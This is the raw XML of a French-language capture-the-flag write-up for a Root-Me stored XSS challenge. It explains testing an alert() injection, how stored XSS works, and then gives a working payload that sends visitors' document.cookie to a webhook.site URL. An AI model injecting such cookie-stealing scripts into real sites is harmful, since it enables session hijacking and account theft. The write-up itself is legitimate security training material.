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73E80" w14:textId="579143B7" w:rsidR="00D17B6D" w:rsidRDefault="003506A8">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00AC6AD7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://challenge01.root-me.org/web-client/ch18/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50E407F4" w14:textId="5711F840" w:rsidR="003506A8" w:rsidRDefault="003506A8">
      <w:r w:rsidRPr="003506A8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="788C956A" wp14:editId="4679B521">
            <wp:extent cx="5400040" cy="4182110"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="278451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5171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4A7A" w14:textId="55EBF998" w:rsidR="0033368E" w:rsidRDefault="0033368E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0033368E">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Il s’agit d’une </w:t>
      </w:r>
      <w:r w:rsidRPr="0033368E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>room de XSS stockée</w:t>
      </w:r>
      <w:r w:rsidRPr="0033368E">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">, dont l’objectif est de comprendre le fonctionnement du </w:t>
      </w:r>
      <w:r w:rsidRPr="0033368E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>scripting côté client</w:t>
      </w:r>
      <w:r w:rsidRPr="0033368E">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0033368E">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>Deux champs de saisie sont disponibles.</w:t>
      </w:r>
      <w:r w:rsidRPr="0033368E">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Dans un premier temps, nous vérifions si l’exécution de </w:t>
      </w:r>
      <w:r w:rsidRPr="0033368E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>JavaScript basique</w:t>
      </w:r>
      <w:r w:rsidRPr="0033368E">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> est possible, par exemple en injectant un simple alert().</w:t>
      </w:r>
      <w:r w:rsidRPr="0033368E">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="090E825C" wp14:editId="4786E9A9">
            <wp:extent cx="5400040" cy="1083310"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="58007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72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BEC0" w14:textId="77777777" w:rsidR="00FB2E3E" w:rsidRDefault="0033368E" w:rsidP="003506A8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0033368E">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Maintenant que nous savons qu’une injection est possible, il est possible de réaliser une </w:t>
      </w:r>
      <w:r w:rsidRPr="0033368E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>XSS stockée</w:t>
      </w:r>
      <w:r w:rsidRPr="0033368E">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0033368E">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>Globalement, cela consiste à envoyer du code au serveur, qui l’enregistre et l’affiche ensuite sur le site, plutôt que de ne l’exécuter que côté client immédiatement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495EDA95" w14:textId="24D047C4" w:rsidR="00FB2E3E" w:rsidRDefault="00FB2E3E" w:rsidP="003506A8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2E3E">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>On peut en déduire cela car le site permet de poster des commentaires destinés à être lus par tous.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB2E3E">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>Ces commentaires sont donc stockés côté serveur (base de données).</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB2E3E">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>Si un script est injecté et que le serveur est mal configuré, celui</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB2E3E">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>ci sera renvoyé et exécuté chez les visiteurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3959552A" w14:textId="56F45EFE" w:rsidR="003506A8" w:rsidRDefault="0033368E" w:rsidP="003506A8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003506A8" w:rsidRPr="003506A8">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>&lt;script&gt;document.write('&lt;IMG SRC = "https://webhook.site/15207672-1824-4145-bd4d-710da62283c3/ddd?cookie='+document.cookie+'"&gt;');&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A61E406" w14:textId="69F43D7E" w:rsidR="003506A8" w:rsidRDefault="00FB2E3E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2E3E">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Ce script permet d’envoyer une requête vers </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB2E3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>webhook.site</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB2E3E">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>, une plateforme en ligne utilisée pour intercepter et visualiser des requêtes HTTP.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB2E3E">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:br/>
        <w:t>Ainsi, lorsque la page est chargée par un utilisateur, une requête est envoyée, ce qui permet de récupérer les cookies accessibles à ce moment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB2E3E">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>là.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C02274F" w14:textId="77777777" w:rsidR="00FB2E3E" w:rsidRDefault="00FB2E3E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20F346FA" w14:textId="735997F9" w:rsidR="00FB2E3E" w:rsidRPr="00FB2E3E" w:rsidRDefault="00FB2E3E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2E3E">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F281BD9" wp14:editId="5B6A3F74">
            <wp:extent cx="5400040" cy="1559560"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="2026789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894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E3E" w:rsidRPr="00FB2E3E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6D"/>
    <w:rsid w:val="00031BA3"/>
    <w:rsid w:val="00102BB8"/>
    <w:rsid w:val="0033368E"/>
    <w:rsid w:val="003506A8"/>
    <w:rsid w:val="00D17B6D"/>
    <w:rsid w:val="00FB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91EDE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{80C0522F-DC7F-4B9C-9C11-5D45FA595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B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B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B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B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B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B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B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B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B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B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B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6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6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challenge01.root-me.org/web-client/ch18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Kevin</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ZHANG Kevin</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-02T13:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-02T14:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>